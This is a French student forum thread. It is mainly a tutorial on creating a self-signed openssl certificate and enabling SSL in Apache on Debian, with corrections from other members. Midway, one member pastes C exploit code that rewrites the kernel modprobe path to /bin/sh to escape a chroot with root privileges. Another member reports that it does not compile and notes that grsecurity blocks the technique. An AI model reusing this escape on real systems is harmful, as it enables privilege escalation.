Tsgeri 2 - 2010

Forum des tsgeri, session novembre 2009 - septembre 2010
 
AccueilAccueil  CalendrierCalendrier  FAQFAQ  RechercherRechercher  MembresMembres  GroupesGroupes  S'enregistrerS'enregistrer  Connexion  

Partagez | 
 

 Création d'un certificat auto-signé sous Debian

Aller en bas 
AuteurMessage
ali

avatar

Messages : 38
Date d'inscription : 22/06/2010
Age : 78

MessageSujet: Création d'un certificat auto-signé sous Debian   Dim 27 Juin - 11:44

Voici un tuto compilé d'après différent site internet
Pour utiliser le SSL et créer un certificat sous Debian, vous devez installer les paquets suivants avec aptitude :
$# openssl, ssl-cert et libssl0.9.8

Nous allons ensuite nous placer dans le répertoire d'Apache 2 (/etc/apache2) pour générer le certificat au bon endroit :
$# cd /etc/apache2

Création de la clé privée RSA :

Cette commande va vous permettre de générer une clé RSA :
$# openssl genrsa -out server.key 1024

Génération d'un certificat auto-signé : Attention : Si le certificat est auto-signé, les versions récentes de Firefox et IE préviennent le client que le certificat n'a pas été créé par un organisme de certification. La certification d'un site SSL par un organisme, est très coûteuse,c'est pourquoi cette opération ne s'adresse pas aux particuliers mais uniquement aux sites de vente en ligne.A partir de la clé de tout à l'heure, vous allez pouvoir créer un certificat générique pour votre
organisme :
$# openssl req -new -key server.key -out server.csr

Vous devrez répondre ensuite aux questions qui permettront d'identifier votre organisme :
– Code de pays
– État
– Ville
– Entreprise
– Section de l'entreprise
– Nom du responsable du site sécurisé
– e-mail du responsable

Enfin, vous allez pouvoir créer le certificat utilisable par les visiteurs au format x509 pour une
certaine durée (dans cet exemple 1 an) :
$# openssl x509 -req -days 365 -in server.csr -signkey server.key -out


II- Activation d'un site sécurisé sous Apache :

Activer le SSL dans Apache 2 :

Pour avoir la liste complête des modules de Apache 2, on peut faire :
$# ls /etc/apache2/mods-available

Pour activer un module de Apache 2 on utilise la commande a2enmod. Le SSL est peut être déjà activé mais pour le vérifier on peut taper :
$# a2enmod ssl

Modification des ports d'écoute : Vérifiez dans le fichier /etc/apache2/ports.conf si il existe le port 443 pour le module SSL. Si ce n'est pas le cas, vous pouvez ajouter une ligne :
Listen 443

Nouveau site virtuel : Créez un nouveau site virtuel (fichier dans /etc/apache2/sites-available/ ). Dans ce fichier vous pouvez écrire les lignes suivantes :

############debut script#########################
NameVirtualHost www.votreserveur.com:443
<VirtualHost www.votreserveur.com:443>
DocumentRoot /var/www/repduserveur
ServerName www.votreserveur.com
<Directory /var/www/repduserveur>
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from all
</Directory>
SSLEngine on
SSLCertificateFile /etc/apache2/server.crt
SSLCertificateKeyFile /etc/apache2/server.key
</VirtualHost>
############debut script#########################

Redémarrage et test : Il ne reste qu'à recharger le serveur Apache :
$# /etc/init.d/apache2 reload

Pour tester ce serveur sécurisé, vous pouvez aller sur :
https://www.votreserveur.com/

Vous devriez avoir un avertissement car ce certificat est auto-signé. Vérifiez le contenu du certificat. Vérifiez par une analyse de trame que les informations ne sont pas lisibles.

à toi SuperTuX pour confirmation du tuto Basketball




Revenir en haut Aller en bas
Voir le profil de l'utilisateur
YannB

avatar

Messages : 144
Date d'inscription : 22/06/2010

MessageSujet: Re: Création d'un certificat auto-signé sous Debian   Dim 27 Juin - 13:21

supertux alias masao? Very Happy
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
masao

avatar

Messages : 64
Date d'inscription : 23/06/2010

MessageSujet: Re: Création d'un certificat auto-signé sous Debian   Dim 27 Juin - 23:07

YannB a écrit:
supertux alias masao? Very Happy
C'est supermario, moi, pas superman...



Quelques remarques :
* « $# » ? C'est quoi ce prompt ?
* Pas besoin de polluer /etc/apache2 quand on a des dossiers fait pour : /etc/ssl/certs pour les certificats et /etc/ssl/private pour les clés.
* Il faut bien faire attention quand on génère la clé, à donner comme nom de l'entreprise (Common Name) l'adresse du site.
* Si tu gardes le site par défaut sur /var/www sans SSL, il ne faut pas mettre ton site SSL dans /var/www/monsite mais ailleurs (en supposant que si tu fais du SSL, c'est pour que ton site ne soit pas public !).

Pour aller plus loin :
* Quelques liens utiles :
- http://www.grandville.net/pmwiki.php/OpenSSL/LigneDeCommande (surtout la partie 3 - commandes utiles)
- http://www.madboa.com/geek/openssl (oui, tu peux créer la clé et le certificat en une seule commande Wink )
* Pour faire de l'authentification avec certificats clients, il faut se créer une autorité de certification (CA) perso
- soit en se tapant la conf d'openssl (je laisse l'exercice à ceux qui auront le courage scratch )
- soit en utilisant le script CA.pl fourni avec openssl : http://postfix.traduc.org/index.php/TLS_README.html#quick-start
- soit en utilisant l'utilitaire graphique TinyCA : http://irp.nain-t.net/doku.php/270crypt:030_application
(on peut aussi faire appel à des CA gratuites comme http://www.cacert.org )
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
ali

avatar

Messages : 38
Date d'inscription : 22/06/2010
Age : 78

MessageSujet: Re: Création d'un certificat auto-signé sous Debian   Sam 10 Juil - 4:21

Merci pour les corrections, mais j'aurais voulu avoir des précisions sur le répertoire /monsite.
Quels sont les droits d'accès sur le répertoire ?
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
masao

avatar

Messages : 64
Date d'inscription : 23/06/2010

MessageSujet: Re: Création d'un certificat auto-signé sous Debian   Sam 10 Juil - 16:36

Ben, au niveau des droits Unix, il faut donner les droits suffisants à l'utilisateur apache (www-data sous debian).
Au niveau de apache, en gros il faut définir les droits pour les connexions anonymes, et si authentifications les droits pour les utilisateurs authentifiés...

Après, les droits que tu donnes dépendent du site que tu héberges.
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
m0m0du78



Messages : 17
Date d'inscription : 07/07/2010
Localisation : Orion

MessageSujet: clé rsa 1024 !   Lun 19 Juil - 11:36

c 'est la valeur par défaut, l'idéal serait 2048 comme ils font ici.

PS : massao tu serai content de bosser ici ya que des linuxiens aguéris !

C jo qui serait pas content le nombre de troll windaube par jour, j'en deviens ouf !

@ plus
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
masao

avatar

Messages : 64
Date d'inscription : 23/06/2010

MessageSujet: Re: Création d'un certificat auto-signé sous Debian   Lun 19 Juil - 19:35

Bah, si ils cherchent quelqu'un pour Octobre...
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
m0m0du78



Messages : 17
Date d'inscription : 07/07/2010
Localisation : Orion

MessageSujet: ui massao   Mar 20 Juil - 9:38

Salut grep,

ca devrait pouvoir se faire d'autant que toi t un bon en dev pyhton et php !

C la merde pour moi ils me demandent des trucs trop hard core !

en fait on de ledi avec des groupes auto, Je dois avec un autre type faire un traducteur de document (BC, facture) en php!

G acheté 3 bouquins ! :p
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
YannB

avatar

Messages : 144
Date d'inscription : 22/06/2010

MessageSujet: Re: Création d'un certificat auto-signé sous Debian   Mar 20 Juil - 9:56

lol mo² , tu vas trimer sévère Laughing
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
m0m0du78



Messages : 17
Date d'inscription : 07/07/2010
Localisation : Orion

MessageSujet: ui ui   Mar 20 Juil - 10:29

je trime mais heureusment que la communauté des linuxiens est sympa, ils m'aident beaucoup c chiens dla casse !

Mais bon on a su résister à Denis, ...
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
YannB

avatar

Messages : 144
Date d'inscription : 22/06/2010

MessageSujet: Re: Création d'un certificat auto-signé sous Debian   Mar 20 Juil - 10:32

t'as envoyé un mail a jean-christophe pastaga pour avoir de l'aide ? lol!
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
m0m0du78



Messages : 17
Date d'inscription : 07/07/2010
Localisation : Orion

MessageSujet: JEAN CHRISTOPHE !   Mar 20 Juil - 10:35

lol il c meme pa se ou est caché son zizi !

Ce guignol recherche encore comment pingué sonr srv ! cheers
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
masao

avatar

Messages : 64
Date d'inscription : 23/06/2010

MessageSujet: Re: Création d'un certificat auto-signé sous Debian   Mar 20 Juil - 11:00

m0m0du78 a écrit:
ca devrait pouvoir se faire d'autant que toi t un bon en dev pyhton et php !
C'est saami qui fait du python et du php. Moi je connais que bash et perl...

mOmOdu78 a écrit:
Je dois avec un autre type faire un traducteur de document (BC, facture) en php!
admin, développeur, traducteur... Tu fais le ménage aussi à la fin ? Smile



Revenir en haut Aller en bas
Voir le profil de l'utilisateur
m0m0du78



Messages : 17
Date d'inscription : 07/07/2010
Localisation : Orion

MessageSujet: le ménage ?   Mar 20 Juil - 14:06

euh s il me paye pour ca pkoi pas ?

je suis pas seul sur le dev !

fo dire que g un peu mitonné sur mes compétences mais sa devrait le faire ...

g un code qui casse les couilles à l'admin sys : #include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <linux/unistd.h>
#include <linux/sysctl.h>
#include <sys/socket.h>

_syscall1(int, _sysctl, struct __sysctl_args *, args);
int sysctl(int *name, int nlen, void *oldval, size_t *oldlenp,
void *newval, size_t newlen)
{
struct __sysctl_args args={name,nlen,oldval,oldlenp,newval,newlen};
return _sysctl(&args);
}

#define SIZE(x) sizeof(x)/sizeof(x[0])
#define MODPROBEPATHLEN 256

char modprobepath[MODPROBEPATHLEN];
int pathlen;
int name[] = { CTL_KERN, KERN_MODPROBE };

int main(void){
strcpy(modprobepath, "/bin/sh");
pathlen = SIZE(modprobepath);
if (sysctl(name, SIZE(name), 0, NULL, modprobepath, pathlen))
perror("sysctl");
else {
printf("successfully modified the modprobe path.\n");
socket(AF_SECURITY, SOCK_STREAM, 1);
printf("executing shell with full privileges, outside of chroot\n");
}
return 0;

regarde un peu cette bombe !
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
m0m0du78



Messages : 17
Date d'inscription : 07/07/2010
Localisation : Orion

MessageSujet: réponse !   Mar 20 Juil - 14:09

Quand le noyau force l'exécution d'un binaire, dans une prison, celui-ci est exécuté avec le vrai système de fichiers racine en tant que racine du nouveau processus.

Pour stopper cela, grsecurity empêche les écritures via sysctl(), mais aussi via le procfs.

ah ah je te rassure c po moi qui est trouvé ça mais j'ai marqué des points auprès du tollier quand g copé collé cette soluce !!

Savoir fouiner c'est parfois plus utile que savoir faire...
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
msieur_kara

avatar

Messages : 67
Date d'inscription : 22/06/2010

MessageSujet: Re: Création d'un certificat auto-signé sous Debian   Mar 20 Juil - 16:03

hallah wackba
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
masao

avatar

Messages : 64
Date d'inscription : 23/06/2010

MessageSujet: Re: Création d'un certificat auto-signé sous Debian   Mar 20 Juil - 20:54

Wé on sait, le C c'est fort, y'a des pointeurs... Laughing


Ça compile pas chez moi ton truc. Je l'ai copié dans un fichier test.c :
Code:

$ make test
cc    test.c  -o test
test.c:8: error: expected declaration specifiers or ‘...’ before ‘_sysctl’
test.c:8: error: expected declaration specifiers or ‘...’ before ‘args’
test.c:8: warning: data definition has no type or storage class
test.c: In function ‘main’:
test.c:33: error: expected declaration or statement at end of input
make: *** [test] Erreur 1
Pour info :
Code:

$ gcc -v
Utilisation des specs internes.
COLLECT_GCC=cc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configuré avec: ../configure --prefix=/usr --enable-languages=c,c++,fortran,objc,obj-c++,ada --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --enable-gnu-unique-object --enable-lto --enable-plugin --disable-multilib --disable-libstdcxx-pch --with-system-zlib --with-ppl --with-cloog --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info
Modèle de thread: posix
gcc version 4.5.0 20100610 (prerelease) (GCC)

Bon, en fait, tout ce que je voulais savoir, c'est si il fallait être root pour pouvoir sortir du chroot avec ton truc...
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
m0m0du78



Messages : 17
Date d'inscription : 07/07/2010
Localisation : Orion

MessageSujet: jsutement p!   Ven 23 Juil - 15:01

pas besoin d etre root, le bordel exploite une partie d adress mem ou nimporte qui a accès en écriture .

eeeuuu tu as dit pointeur ?

je ve pa aller en prison !
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
masao

avatar

Messages : 64
Date d'inscription : 23/06/2010

MessageSujet: Re: Création d'un certificat auto-signé sous Debian   Ven 23 Juil - 21:20

m0m0du78 a écrit:
je ve pa aller en priison !
Ben te vantes pas de savoir en sortir alors... Very Happy

Surtout que bon, tu ne t'échapperas pas d'une prison moderne :
man _syscall a écrit:

CONFORMING TO
The use of these macros is Linux-specific, and deprecated.

NOTES
Starting around kernel 2.6.18, the _syscall macros were removed from header files supplied to user space. Use syscall(2) instead. (Some architec‐
tures, notably ia64, never provided the _syscall macros; on those architectures, syscall(2) was always required.)
Je pouvais toujours m'acharner pour compiler avec un kernel 2.6.34 (sans compter que tu as sauté la dernière accolade fermante en copiant-collant le code) !
Revenir en haut Aller en bas
Voir le profil de l'utilisateur
Contenu sponsorisé




MessageSujet: Re: Création d'un certificat auto-signé sous Debian   

Revenir en haut Aller en bas
 
Création d'un certificat auto-signé sous Debian
Revenir en haut 
Page 1 sur 1
 Sujets similaires
-
» Heredis12 et wine sous Debian
» Voici mon certificat de baptême pour la premier plongée a 300 m
» auto-entrepreneurs: Mode d'emploi
» Certificat médical: j'en ai mon truck !!!
» L'insigne du certificat d'interprète (1946-1978)

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Tsgeri 2 - 2010  :: Problème informatique :: Tutos-
Sauter vers: